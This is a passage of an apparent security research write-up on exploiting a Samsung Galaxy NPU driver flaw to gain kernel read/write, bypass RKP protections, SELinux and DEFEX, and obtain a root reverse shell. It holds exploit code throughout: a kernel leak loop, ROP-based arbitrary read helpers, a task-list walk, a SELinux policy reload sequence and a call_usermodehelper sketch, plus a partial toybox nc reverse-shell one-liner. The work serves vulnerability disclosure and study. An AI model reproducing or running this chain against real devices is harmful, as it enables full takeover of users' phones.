    res = npu_format_ioctl(&format);
    while (1) {
        if (!res) {
            h = g - 1;
            g = (h + l)/2;
        } else {
            l = g + 1;
            g = (h + l) / 2;
            close(npu_fd);
            fd_clear();

            if ((npu_fd = open("/dev/vertex10", O_RDONLY)) < 0) {
                perror("open(\"/dev/vertext10\") : ");
                goto leak_retry;
            }

            ncp_page->memory_vector_offset = 0x200;
            ncp_page->memory_vector_cnt = 0x1;
            ncp_page->address_vector_offset = off;
            ncp_page->address_vector_cnt = 0x1;
            if (npu_graph_ioctl() < 0) {
                close(npu_fd);
                npu_fd = -1;
                goto leak_retry;
            }
        }
        if (old == g) {
            break;
        }
        old = g;
        memset(&format, 0, sizeof(format));
        format.stride = 0x0;
        format.cstride =  0x0;
        format.height = 1;
        format.width = 1;
        format.pixel_format = 8;
        format.channels = g;
        res = npu_format_test(&format);
    }
  
    close(npu_fd);
    npu_fd = -1;
    return g > 0 ? g+1 : 0;
}

Utilize out-of-bound read/write

Unlike P0, we don't have any restrictions on our out-of-bounds read/write, so our arbitrary address read/write and kernel function call are based on pure ROP.

Similar to P0's pselect(), the read()/write() system calls also block until the target file descriptor is ready, so their arguments are spilled to the stack. We can identify the target function's stack frame by the signature values (like 0x41414141) shown above. Using this blocking behavior of read()/write() on a pipe file descriptor, we can call copy_to_user_fromio()/copy_from_user_toio() interactively through the child process.
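
Conceptually, the parent drives this primitive as sketched below. Every helper name, offset and the ROP layout here are ours and purely illustrative; the real chain depends on the gadgets available in the target kernel image.

#include <stdint.h>
#include <unistd.h>

/* Hypothetical: writes a small ROP chain into the blocked child's spilled
 * read() frame, which was located earlier via the 0x41414141/0x13371337
 * marker arguments, using the NPU out-of-bounds write. */
void build_rop_chain(uint64_t frame_off, uint64_t fn,
                     uint64_t a0, uint64_t a1, uint64_t a2);

extern uint64_t child_frame_off;      /* offset of the child's frame     */
extern uint64_t copy_to_user_fromio;  /* resolved from the leaked kbase  */
extern int trig_pipe[2];              /* pipe the child is blocked on    */

/* Arbitrary read: once the pipe becomes readable, the child's hijacked
 * return path calls copy_to_user_fromio(user_buf, kaddr, len). */
void kernel_read(uint64_t kaddr, void *user_buf, uint64_t len)
{
    build_rop_chain(child_frame_off, copy_to_user_fromio,
                    (uint64_t)user_buf, kaddr, len);
    write(trig_pipe[1], "A", 1);      /* unblock the child, run the chain */
}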

Getting Root Privilege?

As we mentioned at the beginning of this article, due to RKP, simply overwriting the cred structure is not an option on Samsung Galaxy devices. Therefore, to get root privilege, you can't use any of the old methods that work on the mainline Linux kernel or on Google Nexus/Pixel kernels.

  • Can't overwrite cred structure.
  • Can't forge credential related structure.

But all we need right now is root-privileged code execution, to bypass UID checks for further exploitation. As most previous exploit methods focused on forging the current process's credentials, people are obsessed with that approach and don't seem to think of a new way.

Although many resources are protected by Samsung's security mechanisms, a task's kernel stack is still writable. So, by traversing the task list starting from the init process's task_struct, we can find any task's kernel stack!

We can get a task's stack address via the void *stack member in its task_struct. By modifying the target task's kernel stack with our AAW primitive, we can do ROP with that task's privileges. But before doing ROP in the target task, we need to bypass SELinux.
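
For example, once the arbitrary read is available, walking the task list looks roughly like this. kernel_read64 is a hypothetical 64-bit wrapper over the read primitive sketched above, and the task_struct offsets are placeholders that have to be recovered from the matching kernel build.

#include <stdint.h>

uint64_t kernel_read64(uint64_t kaddr);   /* hypothetical AAR wrapper */

/* Placeholder offsets into struct task_struct for this firmware build. */
#define OFFS_STACK  0x20    /* task_struct->stack       */
#define OFFS_TASKS  0x768   /* task_struct->tasks.next  */
#define OFFS_PID    0x9a0   /* task_struct->pid         */

/* Walk the circular task list starting at init_task and return the kernel
 * stack base of the task with the given pid (0 if not found). */
uint64_t find_task_stack(uint64_t init_task, int target_pid)
{
	uint64_t task = init_task;

	do {
		int pid = (int)(uint32_t)kernel_read64(task + OFFS_PID);
		if (pid == target_pid)
			return kernel_read64(task + OFFS_STACK);

		/* tasks.next points at the next task's tasks member. */
		task = kernel_read64(task + OFFS_TASKS) - OFFS_TASKS;
	} while (task != init_task);

	return 0;
}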

Bypass SELinux

As SELinux is on by default in every Android system now, even if an attacker gets root privilege, what they can do depends on the SELinux policy. On Google Android devices, once an attacker has AAR/AAW primitives, SELinux can easily be bypassed by overwriting selinux_enforcing with 0. But the following features were added to Samsung's SELinux.

  • selinux_enforcing is now in kdp_ro section.

  • Disabling SELinux policy reloading.

  • Permissive domain is totally removed.

Samsung Galaxy S7

In KeenLab's Black Hat 2017 whitepaper, they bypassed SELinux on the Samsung Galaxy S7 by reloading the SELinux policy. Because the ss_initialized variable was not protected by RKP, they could overwrite it with 0, which makes the kernel believe SELinux is not initialized yet. After overwriting it, they reloaded the SELinux policy using the libsepol API.

static struct sidtab sidtab;
struct policydb policydb;
#if (defined CONFIG_RKP_KDP && defined CONFIG_SAMSUNG_PRODUCT_SHIP)
int ss_initialized __kdp_ro;
#else
int ss_initialized;
#endif

But in the latest Samsung Galaxy kernel source, ss_initialized is protected by RKP, so this method can't be used anymore.

Samsung Galaxy S8

In IceSwordLab's Samsung Galaxy S8 rooting article, they overwrote security_hook_heads, because this variable was also not protected by RKP, meaning it was writable. But as the following code snippet shows, security_hook_heads is now read-only protected.

// security/security.c
struct security_hook_heads security_hook_heads __lsm_ro_after_init;

Make SELinux policy reload again

Although the ss_initialized variable is protected by RKP, we can still bypass SELinux by abusing the SELinux policy-related APIs in kernel space. First, we need to analyze the security_load_policy function.

// security/selinux/ss/services.c
int security_load_policy(void *data, size_t len)
{
	struct policydb *oldpolicydb, *newpolicydb;
	struct sidtab oldsidtab, newsidtab;
	struct selinux_mapping *oldmap, *map = NULL;
	struct convert_context_args args;
	u32 seqno;
	u16 map_size;
	int rc = 0;
	struct policy_file file = { data, len }, *fp = &file;

	oldpolicydb = kzalloc(2 * sizeof(*oldpolicydb), GFP_KERNEL);
	if (!oldpolicydb) {
		rc = -ENOMEM;
		goto out;
	}
	newpolicydb = oldpolicydb + 1;

	if (!ss_initialized) {
		avtab_cache_init();
		ebitmap_cache_init();
		rc = policydb_read(&policydb, fp);
		if (rc) {
			avtab_cache_destroy();
			ebitmap_cache_destroy();
			goto out;
		}
    
		...
  
#if (defined CONFIG_RKP_KDP && defined CONFIG_SAMSUNG_PRODUCT_SHIP)
     uh_call(UH_APP_RKP, RKP_KDP_X60, (u64)&ss_initialized, 1, 0, 0);

    ...

If SELinux is not initialized, the avtab and ebitmap caches are set up via avtab_cache_init and ebitmap_cache_init. avtab is the access vector table, which represents the type-enforcement tables, and ebitmap is the extensible bitmap, which represents sets of values such as types, roles, categories, and classes.

So, just as the !ss_initialized path would do, we first call avtab_cache_init and ebitmap_cache_init ourselves; because avtab_node_cachep, avtab_xperms_cachep, and ebitmap_node_cachep are not protected by RKP, these variables are simply reinitialized.

Next, we copy our custom SELinux policy data into kernel space and call security_load_policy with it. After clearing the AVC cache, the entire SELinux policy has been replaced with our policy data.
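
Put together, and assuming the arbitrary kernel call/write primitives from earlier plus function addresses resolved from the leaked kernel base, the sequence looks roughly like the sketch below. Using avc_ss_reset() as the "clear the AVC" step is our assumption; the point is only that cached decisions from the old policy must be flushed.

#include <stdint.h>
#include <stddef.h>

/* Hypothetical primitives built in the earlier stages of the exploit. */
uint64_t kernel_call(uint64_t fn, ...);                     /* arbitrary kernel call  */
void     kernel_write(uint64_t kaddr, const void *d, size_t len); /* arbitrary write */

/* Kernel addresses resolved via the KASLR leak (placeholders). */
extern uint64_t sym_avtab_cache_init, sym_ebitmap_cache_init,
                sym_security_load_policy, sym_avc_ss_reset, scratch_kbuf;

void reload_custom_policy(const void *policy, size_t policy_len)
{
	/* 1. Re-create the caches the !ss_initialized path expects; the
	 *    *_cachep pointers are not RKP-protected, so this just works. */
	kernel_call(sym_avtab_cache_init);
	kernel_call(sym_ebitmap_cache_init);

	/* 2. Stage our custom policy blob in a writable kernel buffer. */
	kernel_write(scratch_kbuf, policy, policy_len);

	/* 3. Parse and install it. */
	kernel_call(sym_security_load_policy, scratch_kbuf, (uint64_t)policy_len);

	/* 4. Flush the AVC so decisions cached under the old policy die. */
	kernel_call(sym_avc_ss_reset, (uint64_t)0);
}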

Defeat DEFEX

Even if we successfully gain root privilege by exploiting the kernel and bypassing SELinux, the process's capabilities are still restricted by DEFEX, which was introduced after Oreo (Android 8).

This protection prevents arbitrary processes from running as root, based on defex_static_rules.

// security/samsung/defex_lsm/defex_rules.c
const struct static_rule defex_static_rules[] = {
	{feature_ped_path,"/"},
	{feature_safeplace_status,"1"},
	{feature_immutable_status,"1"},
	{feature_ped_status,"1"},
#ifndef DEFEX_USE_PACKED_RULES
	{feature_ped_exception,"/system/bin/run-as"},	/* DEFAULT */
	{feature_safeplace_path,"/init"},
	{feature_safeplace_path,"/system/bin/init"},
	{feature_safeplace_path,"/system/bin/app_process32"},
	{feature_safeplace_path,"/system/bin/app_process64"},
  
  ...

The task_defex_enforce() function internally calls task_defex_check_creds() to check whether the target process looks suspicious. As the following code shows, it checks three things to determine ALLOW or DENY.

  1. Whether the current process is root (uid == 0 || gid == 0).
  2. Whether the parent process is not root.
  3. Whether the current process is a DEFEX-protected process.

// security/defex_lsm/defex_procs.c
#ifndef CONFIG_SECURITY_DSMS
static int task_defex_check_creds(struct task_struct *p)
#else
static int task_defex_check_creds(struct task_struct *p, int syscall)
#endif /* CONFIG_SECURITY_DSMS */
{
...
		if (CHECK_ROOT_CREDS(p) && !CHECK_ROOT_CREDS(p->real_parent) &&
			task_defex_is_secured(p)) {
		set_task_creds(p->pid, dead_uid, dead_uid, dead_uid);
		if (p->tgid != p->pid)
			set_task_creds(p->tgid, dead_uid, dead_uid, dead_uid);
		case_num = 4;
		goto show_violation;
	}
...

Therefore, if the three conditions above are all satisfied, DEFEX returns -DEFEX_DENY and logs the violation. task_defex_enforce() is hooked into very basic operations, so even if an untrusted app gains root privilege by exploiting the kernel, its basic operations like open/read/write/execve are restricted.

// security/samsung/defex_lsm/defex_procs.c
int task_defex_enforce(struct task_struct *p, struct file *f, int syscall)
{
	int ret = DEFEX_ALLOW;
	int feature_flag;
	const struct local_syscall_struct *item;
	struct defex_context dc;

...

#ifdef DEFEX_SAFEPLACE_ENABLE
	/* Safeplace feature */
	if (feature_flag & FEATURE_SAFEPLACE) {
		if (syscall == __DEFEX_execve) {
			ret = task_defex_safeplace(&dc);
			if (ret == -DEFEX_DENY) {
				if (!(feature_flag & FEATURE_SAFEPLACE_SOFT)) {
					kill_process(p);
					goto do_deny;
				}
			}
		}
	}
#endif /* DEFEX_SAFEPLACE_ENABLE */
  
...

fs/exec.c:
  1983  #ifdef CONFIG_SECURITY_DEFEX
  1984: 	retval = task_defex_enforce(current, file, -__NR_execve);
  1985  	if (retval < 0) {

fs/open.c:
  1083  #ifdef CONFIG_SECURITY_DEFEX
  1084: 		if (!IS_ERR(f) && task_defex_enforce(current, f, -__NR_openat)) {
  1085  			fput(f);

fs/read_write.c:
  568  #ifdef CONFIG_SECURITY_DEFEX
  569: 		if (task_defex_enforce(current, file, -__NR_write))
  570  			return -EPERM;

And since call_usermodehelper also goes through do_execve, as the following code shows, the old method of getting a privileged process this way is blocked by DEFEX.

static int call_usermodehelper_exec_async(void *data)
{
	...
	new = prepare_kernel_cred(current);
	...
	commit_creds(new);
	...
	retval = do_execve(getname_kernel(sub_info->path),
			   (const char __user *const __user *)sub_info->argv,
			   (const char __user *const __user *)sub_info->envp);
  ...

In addition to the DEFEX check in do_execve, before call_usermodehelper_exec_async runs, call_usermodehelper_exec performs another DEFEX check, as the following code snippet shows.

 int call_usermodehelper_exec(struct subprocess_info *sub_info, int wait)
 {
     DECLARE_COMPLETION_ONSTACK(done);
     int retval = 0;
   
		...

#if defined(CONFIG_SECURITY_DEFEX) && ANDROID_VERSION >= 100000 /* Over Q in case of Exynos */
     if (task_defex_user_exec(sub_info->path)) {
         goto out;
     }
 #endif

		...
      
	  queue_work(system_unbound_wq, &sub_info->work);

   	...

The task_defex_user_exec check above was newly added to the Samsung Galaxy kernel in the September 2020 firmware update.

DEFEX Bypass

As we saw above, simply calling call_usermodehelper doesn't work anymore due to the newly updated DEFEX. But ueventd is a root-privileged process whose parent is the init process, and it is not protected by DEFEX.

Similar to the way we bypassed the SELinux restriction, to bypass the new DEFEX all we have to do is call call_usermodehelper's subroutines separately in the context of the ueventd process, as sketched after the following list.

  1. Set call_usermodehelper_setup's arguments in kernel memory via the arbitrary kernel write primitive.
  2. Call call_usermodehelper_setup with our arguments via the arbitrary kernel function call primitive.
  3. Read and copy the system_unbound_wq and sub_info data.
  4. Call queue_work with the copied system_unbound_wq and sub_info.
  5. Due to the DEFEX check in do_execve, we use a shell one-liner like /system/bin/sh -c "while [ 1 ] ; do /system/bin/toybox nc ..." because /system/bin/sh has the feature_safeplace_path attribute.
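
A rough sketch of that sequence, driven through the arbitrary kernel call/read primitives. All symbol addresses, the GFP_KERNEL value and WORK_CPU_UNBOUND below are build-specific placeholders; note that queue_work() is an inline wrapper, so the real call target is queue_work_on(), and in mainline work is the first member of struct subprocess_info, so sub_info itself can be passed as the work pointer.

#include <stdint.h>

uint64_t kernel_call(uint64_t fn, ...);   /* arbitrary kernel function call */
uint64_t kernel_read64(uint64_t kaddr);   /* arbitrary kernel read          */

/* Resolved kernel symbols and argument buffers staged in kernel memory
 * beforehand via the AAW primitive (all placeholders). */
extern uint64_t sym_call_usermodehelper_setup, sym_queue_work_on,
                sym_system_unbound_wq;
extern uint64_t kpath, kargv, kenvp;      /* "/system/bin/sh", argv, envp */

void spawn_root_process(void)
{
	/* Steps 1-2: build the subprocess_info ourselves, so the new
	 * task_defex_user_exec() check in call_usermodehelper_exec() is
	 * never reached. 0 stands in for the build's GFP_KERNEL value. */
	uint64_t sub_info = kernel_call(sym_call_usermodehelper_setup,
	                                kpath, kargv, kenvp,
	                                /* GFP_KERNEL */ (uint64_t)0,
	                                (uint64_t)0, (uint64_t)0, (uint64_t)0);

	/* Steps 3-4: queue the work item exactly like
	 * call_usermodehelper_exec() would have done. */
	uint64_t wq = kernel_read64(sym_system_unbound_wq);
	kernel_call(sym_queue_work_on,
	            /* WORK_CPU_UNBOUND */ (uint64_t)-1,
	            wq, sub_info /* == &sub_info->work */);
}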

In this way, we can get a reverse shell from a remote server with full kernel privileges.

DEMO

Conclusion

Currently, both Android and iOS are trying to prevent attackers from exploiting their systems. Exterminating every bug is basically impossible, so their focus is on hardening mitigations by introducing CFI-like mechanisms. Although these mitigations significantly decrease the exploitation success rate, we can always find bypasses in their design assumptions.